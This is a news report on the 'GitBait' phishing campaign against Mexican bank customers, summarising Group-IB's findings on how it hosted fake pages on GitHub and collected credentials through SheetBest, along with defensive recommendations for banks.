A sophisticated phishing operation has emerged, targeting the banking credentials of customers at various Mexican financial institutions. Notably, this campaign, named "GitBait," has managed to execute its deceptive strategies without the necessity of any dedicated server infrastructure. Instead, it operates stealthily within trusted cloud platforms, complicating efforts to detect and disrupt its activities.
According to a recent analysis released by Group-IB, GitBait has engaged in phishing attacks against no fewer than 12 financial institutions across Mexico over the past three years. The campaign ingeniously bypasses traditional detection methods by hosting counterfeit banking pages on GitHub Pages. Simultaneously, it channels stolen login information through SheetBest, a legitimate online service that directs data straight into Google Sheets. This unconventional approach has resulted in minimal infrastructure that can be readily dismantled, posing a unique challenge for cybersecurity experts.
Group-IB’s investigation revealed that more than 100 domains hosted on GitHub were linked to the GitBait scheme, each containing multiple phishing pages. The cybersecurity firm took proactive measures by reporting all identified domains to GitHub, underscoring the scale of this operation.
The Mechanics of a Serverless Operation
At the core of this sophisticated phishing scheme is a modular phishing kit equipped with a user-friendly desktop and mobile operator panel. This setup enables attackers to select their target bank and effortlessly generate a counterfeit webpage that mimics the institution’s branding.
Each GitHub repository associated with GitBait contained mirrored versions of the phishing pages. This redundancy means that even if a particular page were to be taken down, it could be swiftly redeployed by the attackers. Victims often find themselves landing on pages that clone their bank’s branding, leading them into a trap where they are asked for sensitive information such as usernames, customer IDs, passwords, and card details. A cleverly designed script captures these entries and transmits them to SheetBest, after which a counterfeit verification screen is displayed to maintain an illusion of legitimacy and build user trust.
While Group-IB could not definitively ascertain how victims were initially entrapped, investigative evidence suggests that direct messaging was a likely method. The phishing pages were meticulously crafted with Open Graph tags, enabling them to render a convincing bank-branded preview card when shared via platforms like WhatsApp, Telegram, or SMS. To further evade detection, a noindex tag was employed, effectively removing these pages from search engine results.
Delving deeper into the operation, commit records from one of the GitHub repositories highlighted ongoing and active maintenance of the phishing structure. Data revealed:
- A total of 66 commits, indicating frequent updates and enhancements.
- Three different contributor accounts, some of which appeared to share an email address, potentially suggesting collaboration.
- Automated publishing mechanisms through Jekyll and GitHub Actions.
- Rotating endpoints managed by an operator account that remained active during the analysis.
Additionally, the phishing pages utilized obfuscated JavaScript sourced from randomized paths. This tactic allows operators to rotate their payloads without making adjustments to the visible page structure, thereby complicating the efforts of static analysis tools employed by cybersecurity teams.
Navigating Beyond Conventional Blocklists
In framing GitBait’s strategies, Group-IB emphasized a significant trend among cybercriminals—an inclination towards leveraging everyday cloud services and readily available phishing kits as opposed to developing custom malware and self-hosted servers. This shift resonates with the rising prominence of phishing-as-a-service platforms that have surfaced in recent years.
Given that the operation primarily relied on seemingly reputable domains, Group-IB cautioned that traditional blocklists detailing known malicious sites may offer little in the way of protection. This reality presents a considerable challenge for financial institutions looking to safeguard their customers.
Consequently, Group-IB has urged banks and financial entities to remain vigilant in monitoring GitHub for instances of brand misuse and to investigate any unexpected traffic to services like SheetBest. They recommend implementing behavioral detection methods, alongside robust measures such as multi-factor authentication (MFA) and transaction alerts, to mitigate the risk posed by such advanced phishing operations.
As the digital landscape continues to evolve, the emergence of campaigns like GitBait underscores the persistent threats that financial institutions and their customers face, necessitating dynamic responses and innovative cybersecurity strategies.